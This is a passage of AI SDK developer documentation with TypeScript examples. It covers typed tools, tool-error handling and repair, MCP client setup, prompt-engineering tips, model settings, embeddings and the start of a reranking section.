The type inference helpers TypedToolCall<TOOLS extends ToolSet>
and TypedToolResult<TOOLS extends ToolSet> can be used to
extract the tool call and tool result types from the tools.
import { TypedToolCall, TypedToolResult, generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const myToolSet = {
firstTool: tool({
description: 'Greets the user',
inputSchema: z.object({ name: z.string() }),
execute: async ({ name }) => `Hello, ${name}!`,
}),
secondTool: tool({
description: 'Tells the user their age',
inputSchema: z.object({ age: z.number() }),
execute: async ({ age }) => `You are ${age} years old!`,
}),
};
type MyToolCall = TypedToolCall<typeof myToolSet>;
type MyToolResult = TypedToolResult<typeof myToolSet>;
async function generateSomething(prompt: string): Promise<{
text: string;
toolCalls: Array<MyToolCall>; // typed tool calls
toolResults: Array<MyToolResult>; // typed tool results
}> {
return generateText({
model: __MODEL__,
tools: myToolSet,
prompt,
});
}
Handling Errors
The AI SDK has three tool-call related errors:
- NoSuchToolError: the model tries to call a tool that is not defined in the tools object
- InvalidToolInputError: the model calls a tool with inputs that do not match the tool's input schema
- ToolCallRepairError: an error that occurred during tool call repair
When tool execution fails (errors thrown by your tool's execute function), the AI SDK adds them as tool-error content parts to enable automated LLM roundtrips in multi-step scenarios.
generateText
generateText throws errors for tool schema validation issues and other failures, which can be handled using a try/catch block. Tool execution errors appear as tool-error parts in the result steps:
import { generateText, NoSuchToolError, InvalidToolInputError } from 'ai';
try {
const result = await generateText({
//...
});
} catch (error) {
if (NoSuchToolError.isInstance(error)) {
// handle the no such tool error
} else if (InvalidToolInputError.isInstance(error)) {
// handle the invalid tool inputs error
} else {
// handle other errors
}
}
Tool execution errors are available in the result steps:
const { steps } = await generateText({
// ...
});
// check for tool errors in the steps
const toolErrors = steps.flatMap(step =>
step.content.filter(part => part.type === 'tool-error'),
);
toolErrors.forEach(toolError => {
console.log('Tool error:', toolError.error);
console.log('Tool name:', toolError.toolName);
console.log('Tool input:', toolError.input);
});
streamText
streamText sends errors as part of the full stream. Tool execution errors appear as tool-error parts, while other errors appear as error parts.
When using toUIMessageStreamResponse, you can pass an onError function to extract the error message from the error part and forward it as part of the stream response:
import { streamText, NoSuchToolError, InvalidToolInputError } from 'ai';
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
onError: error => {
if (NoSuchToolError.isInstance(error)) {
return 'The model tried to call an unknown tool.';
} else if (InvalidToolInputError.isInstance(error)) {
return 'The model called a tool with invalid inputs.';
} else {
return 'An unknown error occurred.';
}
},
});
Tool Call Repair
Language models sometimes fail to generate valid tool calls, especially when the input schema is complex or the model is smaller.
If you use multiple steps, those failed tool calls will be sent back to the LLM in the next step to give it an opportunity to fix them. However, you may want to control how invalid tool calls are repaired without requiring additional steps that pollute the message history.
You can use the experimental_repairToolCall function to attempt to repair the tool call
with a custom function.
You can use different strategies to repair the tool call:
- Use a model with structured outputs to generate the inputs.
- Send the messages, system prompt, and tool schema to a stronger model to generate the inputs.
- Provide more specific repair instructions based on which tool was called.
Example: Use a model with structured outputs for repair
import { generateText, NoSuchToolError, Output } from 'ai';
const result = await generateText({
model,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
inputSchema,
error,
}) => {
if (NoSuchToolError.isInstance(error)) {
return null; // do not attempt to fix invalid tool names
}
const tool = tools[toolCall.toolName as keyof typeof tools];
const { output: repairedArgs } = await generateText({
model: __MODEL__,
output: Output.object({ schema: tool.inputSchema }),
prompt: [
`The model tried to call the tool "${toolCall.toolName}"` +
` with the following inputs:`,
JSON.stringify(toolCall.input),
`The tool accepts the following schema:`,
JSON.stringify(inputSchema(toolCall)),
'Please fix the inputs.',
].join('\n'),
});
return { ...toolCall, input: JSON.stringify(repairedArgs) };
},
});
Example: Use the re-ask strategy for repair
import { generateText } from 'ai';
const result = await generateText({
model,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
error,
messages,
system,
}) => {
const result = await generateText({
model,
system,
messages: [
...messages,
{
role: 'assistant',
content: [
{
type: 'tool-call',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
input: toolCall.input,
},
],
},
{
role: 'tool' as const,
content: [
{
type: 'tool-result',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
output: error.message,
},
],
},
],
tools,
});
const newToolCall = result.toolCalls.find(
newToolCall => newToolCall.toolName === toolCall.toolName,
);
return newToolCall != null
? {
type: 'tool-call' as const,
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
input: JSON.stringify(newToolCall.input),
}
: null;
},
});
Active Tools
Language models can only handle a limited number of tools at a time, depending on the model.
To allow for static typing over a large set of tools while limiting the tools that are available to the model at the same time,
the AI SDK provides the activeTools property.
It is an array of tool names that are currently active.
By default, the value is undefined and all tools are active.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
tools: myToolSet,
activeTools: ['firstTool'],
});
Multi-modal Tool Results
For Google, use base64 media parts (image-data / file-data) or base64
data: URLs in URL-style parts. Remote HTTP(S) URLs in tool-result URL parts
are not supported.
In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.
AI SDK Core tools have an optional toModelOutput function
that converts the tool result into a content part.
Here is an example for converting a screenshot into a content part:
const result = await generateText({
model: __MODEL__,
tools: {
computer: anthropic.tools.computer_20241022({
// ...
async execute({ action, coordinate, text }) {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return {
type: 'content',
value:
typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'media', data: output.data, mediaType: 'image/png' }],
};
},
}),
},
// ...
});
Extracting Tools
Once you start having many tools, you might want to extract them into separate files.
The tool helper function is crucial for this, because it ensures correct type inference.
Here is an example of an extracted tool:
import { tool } from 'ai';
import { z } from 'zod';
// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
});
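The extracted tool can then be imported and used like any inline tool. A sketch, assuming the file above is saved as tools/weather-tool.ts:
import { generateText, stepCountIs } from 'ai';
import { weatherTool } from './tools/weather-tool'; // hypothetical path
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  tools: { weather: weatherTool },
  stopWhen: stepCountIs(5),
  prompt: 'What is the weather in San Francisco?',
});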
MCP Tools
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools. MCP enables your AI applications to discover and use tools across various services through a standardized interface.
For detailed information about MCP tools, including initialization, transport options, and usage patterns, see the MCP Tools documentation.
AI SDK Tools vs MCP Tools
In most cases, you should define your own AI SDK tools for production applications. They provide full control, type safety, and optimal performance. MCP tools are best suited for rapid development iteration and scenarios where users bring their own tools.
| Aspect | AI SDK Tools | MCP Tools |
|---|---|---|
| Type Safety | Full static typing end-to-end | Dynamic discovery at runtime |
| Execution | Same process as your request (low latency) | Separate server (network overhead) |
| Prompt Control | Full control over descriptions and schemas | Controlled by MCP server owner |
| Schema Control | You define and optimize for your model | Controlled by MCP server owner |
| Version Management | Full visibility over updates | Can update independently (version skew risk) |
| Authentication | Same process, no additional auth required | Separate server introduces additional auth complexity |
| Best For | Production applications requiring control and performance | Development iteration, user-provided tools |
Examples
You can see tools in action using various frameworks in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use tools in Node.js', link: '/cookbook/node/call-tools', }, { title: 'Learn to use tools in Next.js with Route Handlers', link: '/cookbook/next/call-tools', }, { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, ]} />
title: Model Context Protocol (MCP) description: Learn how to connect to Model Context Protocol (MCP) servers and use their tools with AI SDK Core.
Model Context Protocol (MCP)
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools, resources, and prompts. This enables your AI applications to discover and use capabilities across various services through a standardized interface.
Initializing an MCP Client
We recommend using HTTP transport (like StreamableHTTPClientTransport) for production deployments. The stdio transport should only be used for connecting to local servers as it cannot be deployed to production environments.
Create an MCP client using one of the following transport options:
- HTTP transport (Recommended): Either configure HTTP directly via the client using transport: { type: 'http', ... }, or use MCP's official TypeScript SDK StreamableHTTPClientTransport
- SSE (Server-Sent Events): An alternative HTTP-based transport
- stdio: For local development only. Uses standard input/output streams for local MCP servers
HTTP Transport (Recommended)
For production deployments, we recommend using the HTTP transport. You can configure it directly on the client:
import { createMCPClient } from '@ai-sdk/mcp';
const mcpClient = await createMCPClient({
transport: {
type: 'http',
url: 'https://your-server.com/mcp',
// optional: configure HTTP headers
headers: { Authorization: 'Bearer my-api-key' },
// optional: provide an OAuth client provider for automatic authorization
authProvider: myOAuthClientProvider,
// optional: reject redirect responses to prevent SSRF
redirect: 'error',
},
});
Alternatively, you can use StreamableHTTPClientTransport from MCP's official TypeScript SDK:
import { createMCPClient } from '@ai-sdk/mcp';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';
const url = new URL('https://your-server.com/mcp');
const mcpClient = await createMCPClient({
transport: new StreamableHTTPClientTransport(url, {
sessionId: 'session_123',
}),
});
SSE Transport
SSE provides an alternative HTTP-based transport option. Configure it with a type and url property. You can also provide an authProvider for OAuth:
import { createMCPClient } from '@ai-sdk/mcp';
const mcpClient = await createMCPClient({
transport: {
type: 'sse',
url: 'https://my-server.com/sse',
// optional: configure HTTP headers
headers: { Authorization: 'Bearer my-api-key' },
// optional: provide an OAuth client provider for automatic authorization
authProvider: myOAuthClientProvider,
// optional: reject redirect responses to prevent SSRF
redirect: 'error',
},
});
Stdio Transport (Local Servers)
The Stdio transport can be imported from either the MCP SDK or the AI SDK:
import { createMCPClient } from '@ai-sdk/mcp';
import { StdioClientTransport } from '@modelcontextprotocol/sdk/client/stdio.js';
// Or use the AI SDK's stdio transport:
// import { Experimental_StdioMCPTransport as StdioClientTransport } from '@ai-sdk/mcp/mcp-stdio';
const mcpClient = await createMCPClient({
transport: new StdioClientTransport({
command: 'node',
args: ['src/stdio/dist/server.js'],
}),
});
Custom Transport
You can also bring your own transport by implementing the MCPTransport interface for specific requirements not covered by the standard transports.
Authorization via OAuth is supported when using the AI SDK MCP HTTP or SSE
transports by providing an authProvider.
Closing the MCP Client
After initialization, you should close the MCP client based on your usage pattern:
- For short-lived usage (e.g., single requests), close the client when the response is finished
- For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates
When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:
const mcpClient = await createMCPClient({
// ...
});
const tools = await mcpClient.tools();
const result = await streamText({
model: __MODEL__,
tools,
prompt: 'What is the weather in Brooklyn, New York?',
onFinish: async () => {
await mcpClient.close();
},
});
When generating responses without streaming, you can use try/finally or cleanup functions in your framework:
import { createMCPClient, type MCPClient } from '@ai-sdk/mcp';
let mcpClient: MCPClient | undefined;
try {
mcpClient = await createMCPClient({
// ...
});
} finally {
await mcpClient?.close();
}
Using MCP Tools
The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:
Schema Discovery
With schema discovery, all tools offered by the server are automatically listed, and input parameter types are inferred based on the schemas provided by the server:
const tools = await mcpClient.tools();
This approach is simpler to implement and automatically stays in sync with server changes. However, you won't have TypeScript type safety during development, and all tools from the server will be loaded.
Schema Definition
For better type safety and control, you can define the tools and their input schemas explicitly in your client code:
import { z } from 'zod';
const tools = await mcpClient.tools({
schemas: {
'get-data': {
inputSchema: z.object({
query: z.string().describe('The data query'),
format: z.enum(['json', 'text']).optional(),
}),
},
// For tools with zero inputs, you should use an empty object:
'tool-with-no-args': {
inputSchema: z.object({}),
},
},
});
This approach provides full TypeScript type safety and IDE autocompletion, letting you catch parameter mismatches during development. When you define schemas, the client only pulls the explicitly defined tools, keeping your application focused on the tools it needs.
Typed Tool Outputs
When MCP servers return structuredContent (per the MCP specification), you can define an outputSchema to get typed tool results:
import { z } from 'zod';
const tools = await mcpClient.tools({
schemas: {
'get-weather': {
inputSchema: z.object({
location: z.string(),
}),
// Define outputSchema for typed results
outputSchema: z.object({
temperature: z.number(),
conditions: z.string(),
humidity: z.number(),
}),
},
},
});
const result = await tools['get-weather'].execute(
{ location: 'New York' },
{ messages: [], toolCallId: 'weather-1' },
);
console.log(`Temperature: ${result.temperature}°C`);
When outputSchema is provided:
- The client extracts structuredContent from the tool result
- The output is validated against your schema at runtime
- You get full TypeScript type safety for the result
If the server doesn't return structuredContent, the client falls back to parsing JSON from the text content. If neither is available or validation fails, an error is thrown.
Using MCP Resources
According to the MCP specification, resources are application-driven data sources that provide context to the model. Unlike tools (which are model-controlled), your application decides when to fetch and pass resources as context.
The MCP client provides three methods for working with resources:
Listing Resources
List all available resources from the MCP server:
const resources = await mcpClient.listResources();
Reading Resource Contents
Read the contents of a specific resource by its URI:
const resourceData = await mcpClient.readResource({
uri: 'file:///example/document.txt',
});
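Because resources are application-driven, a common pattern is to read a resource yourself and pass its text to the model as context. A sketch, assuming the server returns text contents as defined in the MCP specification:
import { generateText } from 'ai';

const resourceData = await mcpClient.readResource({
  uri: 'file:///example/document.txt',
});

// assumption: text resource contents per the MCP specification
const contextText = resourceData.contents
  .filter(content => 'text' in content)
  .map(content => content.text)
  .join('\n');

const { text } = await generateText({
  model: __MODEL__,
  prompt: `Context:\n${contextText}\n\nSummarize the key points of this document.`,
});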
Listing Resource Templates
Resource templates are dynamic URI patterns that allow flexible queries. List all available templates:
const templates = await mcpClient.listResourceTemplates();
Using MCP Prompts
According to the MCP specification, prompts are user-controlled templates that servers expose for clients to list and retrieve with optional arguments.
Listing Prompts
const prompts = await mcpClient.experimental_listPrompts();
Getting a Prompt
Retrieve prompt messages, optionally passing arguments defined by the server:
const prompt = await mcpClient.experimental_getPrompt({
name: 'code_review',
arguments: { code: 'function add(a, b) { return a + b; }' },
});
Handling Elicitation Requests
Elicitation is a mechanism where MCP servers can request additional information from the client during tool execution. For example, a server might need user input to complete a registration form or confirmation for a sensitive operation.
Enabling Elicitation Support
To enable elicitation, you need to advertise the capability when creating the MCP client:
const mcpClient = await createMCPClient({
transport: {
type: 'sse',
url: 'https://your-server.com/sse',
},
capabilities: {
elicitation: {},
},
});
Registering an Elicitation Handler
Use the onElicitationRequest method to register a handler that will be called when the server requests input:
import { ElicitationRequestSchema } from '@ai-sdk/mcp';
mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
// request.params.message: A message describing what input is needed
// request.params.requestedSchema: JSON schema defining the expected input structure
// Get input from the user (implement according to your application's needs)
const userInput = await getInputFromUser(
request.params.message,
request.params.requestedSchema,
);
// Return the result with one of three actions:
return {
action: 'accept', // or 'decline' or 'cancel'
content: userInput, // only required when action is 'accept'
};
});
Elicitation Response Actions
Your handler must return an object with an action field that can be one of:
- 'accept': User provided the requested information. Must include content with the data.
- 'decline': User chose not to provide the information.
- 'cancel': User cancelled the operation entirely.
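For example, a handler that maps a user's refusal to 'decline' could look like this (promptUserForInput is a hypothetical UI helper):
mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
  // Hypothetical helper: returns the user's input, or null if they refused
  const input = await promptUserForInput(request.params);
  return input === null
    ? { action: 'decline' } // no content field needed when declining
    : { action: 'accept', content: input };
});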
Examples
You can see MCP in action in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, { title: 'Learn to handle MCP elicitation requests in Node.js', link: '/cookbook/node/mcp-elicitation', }, ]} />
title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.
Prompt Engineering
Tips
Prompts for Tools
When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.
Here are a few tips to help you get the best results:
- Use a model that is strong at tool calling, such as gpt-5 or gpt-4.1. Weaker models will often struggle to call tools effectively and flawlessly.
- Keep the number of tools low, e.g. 5 or fewer.
- Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
- Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
- Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
- When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
- You can include example inputs/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.
In general, the goal should be to give the model all the information it needs in a clear way, as in the sketch below.
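Here is an illustrative sketch that applies several of these tips (the tool, its fields, and the return value are hypothetical):
import { tool } from 'ai';
import { z } from 'zod';
const getFlightStatus = tool({
  // Describe the output so the model can chain dependent tools
  description:
    'Get the current status of a flight. Returns the departure gate and a status string such as "on time" or "delayed".',
  inputSchema: z.object({
    flightNumber: z.string().describe('IATA flight number, e.g. "UA123"'),
    date: z.string().describe('Departure date in YYYY-MM-DD format'),
  }),
  execute: async ({ flightNumber, date }) => {
    // Hypothetical lookup; replace with your data source
    return { gate: 'B12', status: 'on time' };
  },
});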
Tool & Structured Data Schemas
The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since it is not one-to-one.
Zod Dates
Zod expects JavaScript Date objects, but models return dates as strings.
You can specify and validate the date format using z.string().datetime() or z.string().date(),
and then use a Zod transformer to convert the string to a Date object.
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
events: z.array(
z.object({
event: z.string(),
date: z
.string()
.date()
.transform(value => new Date(value)),
}),
),
}),
}),
prompt: 'List 5 important events from the year 2000.',
});
Optional Parameters
When working with tools that have optional parameters, you may encounter compatibility issues with certain providers that use strict schema validation.
For maximum compatibility, optional parameters should use .nullable() instead of .optional():
// This may fail with strict schema validation
const failingTool = tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
workdir: z.string().optional(), // This can cause errors
timeout: z.string().optional(),
}),
});
// This works with strict schema validation
const workingTool = tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
workdir: z.string().nullable(), // Use nullable instead
timeout: z.string().nullable(),
}),
});
Temperature Settings
For tool calls and object generation, it's recommended to use temperature: 0 to ensure deterministic and consistent results:
const result = await generateText({
model: __MODEL__,
temperature: 0, // Recommended for tool calls
tools: {
myTool: tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
}),
}),
},
prompt: 'Execute the ls command',
});
Lower temperature values reduce randomness in model outputs, which is particularly important when the model needs to:
- Generate structured data with specific formats
- Make precise tool calls with correct parameters
- Follow strict schemas consistently
Debugging
Inspecting Warnings
Not all providers support all AI SDK features. Providers either throw exceptions or return warnings when they do not support a feature. To check if your prompt, tools, and settings are handled correctly by the provider, you can check the call warnings:
const result = await generateText({
model: __MODEL__,
prompt: 'Hello, world!',
});
console.log(result.warnings);
HTTP Request Bodies
You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific format.
Request bodies are available via the request.body property of the response:
const result = await generateText({
model: __MODEL__,
prompt: 'Hello, world!',
});
console.log(result.request.body);
title: Settings description: Learn how to configure the AI SDK.
Settings
Large language models (LLMs) typically provide settings to augment their output.
All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:
const result = await generateText({
model: __MODEL__,
maxOutputTokens: 512,
temperature: 0.3,
maxRetries: 5,
prompt: 'Invent a new holiday and describe its traditions.',
});
maxOutputTokens
Maximum number of tokens to generate.
temperature
Temperature setting.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means almost deterministic results, and higher values mean more randomness.
It is recommended to set either temperature or topP, but not both.
In AI SDK 5.0, temperature is no longer set to 0 by default.
topP
Nucleus sampling.
The value is passed through to the provider. The range depends on the provider and model. For most providers, nucleus sampling is a number between 0 and 1. E.g. 0.1 would mean that only tokens with the top 10% probability mass are considered.
It is recommended to set either temperature or topP, but not both.
topK
Only sample from the top K options for each subsequent token.
Used to remove "long tail" low probability responses.
Recommended for advanced use cases only. You usually only need to use temperature.
presencePenalty
The presence penalty affects the likelihood of the model repeating information that is already in the prompt.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
frequencyPenalty
The frequency penalty affects the likelihood of the model repeatedly using the same words or phrases.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
stopSequences
The stop sequences to use for stopping the text generation.
If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.
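For example, to stop generation at a custom marker (a minimal sketch; the marker string is arbitrary):
const result = await generateText({
  model: __MODEL__,
  prompt: 'List the planets of the solar system, then write END.',
  stopSequences: ['END'], // generation stops once "END" is produced
});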
seed
The seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.
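Example (the seed value is arbitrary):
const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  seed: 42, // same seed + same inputs => same output, if the model supports seeds
});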
maxRetries
Maximum number of retries. Set to 0 to disable retries. Default: 2.
abortSignal
An optional abort signal that can be used to cancel the call.
The abort signal can e.g. be forwarded from a user interface to cancel the call,
or to define a timeout using AbortSignal.timeout.
Example: AbortSignal.timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
abortSignal: AbortSignal.timeout(5000), // 5 seconds
});
timeout
An optional timeout in milliseconds. The call will be aborted if it takes longer than the specified duration.
This is a convenience parameter that creates an abort signal internally. It can be used alongside abortSignal - if both are provided, the call will abort when either condition is met.
You can specify the timeout either as a number (milliseconds) or as an object with totalMs, stepMs, and/or chunkMs properties:
- totalMs: The total timeout for the entire call including all steps.
- stepMs: The timeout for each individual step (LLM call). This is useful for multi-step generations where you want to limit the time spent on each step independently.
- chunkMs: The timeout between stream chunks (streaming only). The call will abort if no new chunk is received within this duration. This is useful for detecting stalled streams.
Example: 5 second timeout (number format)
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: 5000, // 5 seconds
});
Example: 5 second total timeout (object format)
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: { totalMs: 5000 }, // 5 seconds
});
Example: 10 second step timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: { stepMs: 10000 }, // 10 seconds per step
});
Example: Combined total and step timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: {
totalMs: 60000, // 60 seconds total
stepMs: 10000, // 10 seconds per step
},
});
Example: Per-chunk timeout for streaming (streamText only)
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: { chunkMs: 5000 }, // abort if no chunk received for 5 seconds
});
headers
Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.
You can use the request headers to provide additional information to the provider,
depending on what the provider supports. For example, some observability providers support
headers such as Prompt-Id.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
headers: {
'Prompt-Id': 'my-prompt-id',
},
});
title: Embeddings description: Learn how to embed values with the AI SDK.
Embeddings
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
Embedding a Single Value
The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words or phrases, or clustering text.
You can use it with embedding models, e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').
import { embed } from 'ai';
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embedding models,
e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').
import { embedMany } from 'ai';
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Embedding Similarity
After embedding values, you can calculate the similarity between them using the cosineSimilarity function.
This is useful to e.g. find similar words or phrases in a dataset.
You can also rank and filter related items based on their similarity.
import { cosineSimilarity, embedMany } from 'ai';
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: ['sunny day at the beach', 'rainy afternoon in the city'],
});
console.log(
`cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);
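To rank many documents against a query, you can embed the query separately and sort by similarity. A minimal sketch:
import { cosineSimilarity, embed, embedMany } from 'ai';
const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: documents,
});
const { embedding: queryEmbedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'wet weather',
});
const ranked = documents
  .map((document, i) => ({
    document,
    score: cosineSimilarity(queryEmbedding, embeddings[i]),
  }))
  .sort((a, b) => b.score - a.score); // most similar first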
Token Usage
Many providers charge based on the number of tokens used to generate embeddings.
Both embed and embedMany provide token usage information in the usage property of the result object:
import { embed } from 'ai';
const { embedding, usage } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
console.log(usage); // { tokens: 10 }
Settings
Provider Options
Embedding model settings can be configured using providerOptions for provider-specific parameters:
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // Reduce embedding dimensions
},
},
});
Parallel Requests
The embedMany function supports parallel processing. You can use the maxParallelCalls setting to limit the number of concurrent requests and tune performance:
import { embedMany } from 'ai';
const { embeddings, usage } = await embedMany({
maxParallelCalls: 2, // Limit parallel requests
model: 'openai/text-embedding-3-small',
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Retries
Both embed and embedMany accept an optional maxRetries parameter of type number
that you can use to set the maximum number of retries for the embedding process.
It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
maxRetries: 0, // Disable retries
});
Abort Signals and Timeouts
Both embed and embedMany accept an optional abortSignal parameter of
type AbortSignal
that you can use to abort the embedding process or set a timeout.
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
Both embed and embedMany accept an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the embedding request.
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
headers: { 'X-Custom-Header': 'custom-value' },
});
Response Information
Both embed and embedMany return response information that includes the raw provider response:
import { embed } from 'ai';
const { embedding, response } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
console.log(response); // Raw provider response
Embedding Middleware
You can enhance embedding models, e.g. to set default values, using
wrapEmbeddingModel and EmbeddingModelMiddleware.
Here is an example that uses the built-in defaultEmbeddingSettingsMiddleware:
import {
defaultEmbeddingSettingsMiddleware,
embed,
wrapEmbeddingModel,
gateway,
} from 'ai';
const embeddingModelWithDefaults = wrapEmbeddingModel({
model: gateway.embeddingModel('google/gemini-embedding-001'),
middleware: defaultEmbeddingSettingsMiddleware({
settings: {
providerOptions: {
google: {
outputDimensionality: 256,
taskType: 'CLASSIFICATION',
},
},
},
}),
});
Embedding Providers & Models
Several providers offer embedding models:
| Provider | Model | Embedding Dimensions | Multimodal |
|---|---|---|---|
| OpenAI | text-embedding-3-large | 3072 | |
| OpenAI | text-embedding-3-small | 1536 | |
| OpenAI | text-embedding-ada-002 | 1536 | |
| Google Generative AI | gemini-embedding-001 | 3072 | |
| Google Generative AI | gemini-embedding-2-preview | 3072 | |
| Mistral | mistral-embed | 1024 | |
| Cohere | embed-english-v3.0 | 1024 | |
| Cohere | embed-multilingual-v3.0 | 1024 | |
| Cohere | embed-english-light-v3.0 | 384 | |
| Cohere | embed-multilingual-light-v3.0 | 384 | |
| Cohere | embed-english-v2.0 | 4096 | |
| Cohere | embed-english-light-v2.0 | 1024 | |
| Cohere | embed-multilingual-v2.0 | 768 | |
| Amazon Bedrock | amazon.titan-embed-text-v1 | 1536 | |
| Amazon Bedrock | amazon.titan-embed-text-v2:0 | 1024 | |
title: Reranking description: Learn how to rerank documents with the AI SDK.
Reranking
Reranking is a technique used to improve search relevance by reordering a set of documents based on their relevance to a query. Unlike embedding-based similarity search, reranking models are specifically trained to understand the relationship between queries and documents, often producing more accurate relevance scores.
Reranking Documents
The AI SDK provides the rerank function to rerank documents based on their relevance to a query.
You can use it with reranking models, e.g. cohere.reranking('rerank-v3.5') or bedrock.reranking('cohere.rerank-v3-5:0').
import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'talk about rain',
topN: 2, // Return top 2 most relevant documents
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Working with Object Documents
Reranking also supports structured documents (JSON objects), making it ideal for searching through databases, emails, or other structured content:
import { rerank } from 'ai';
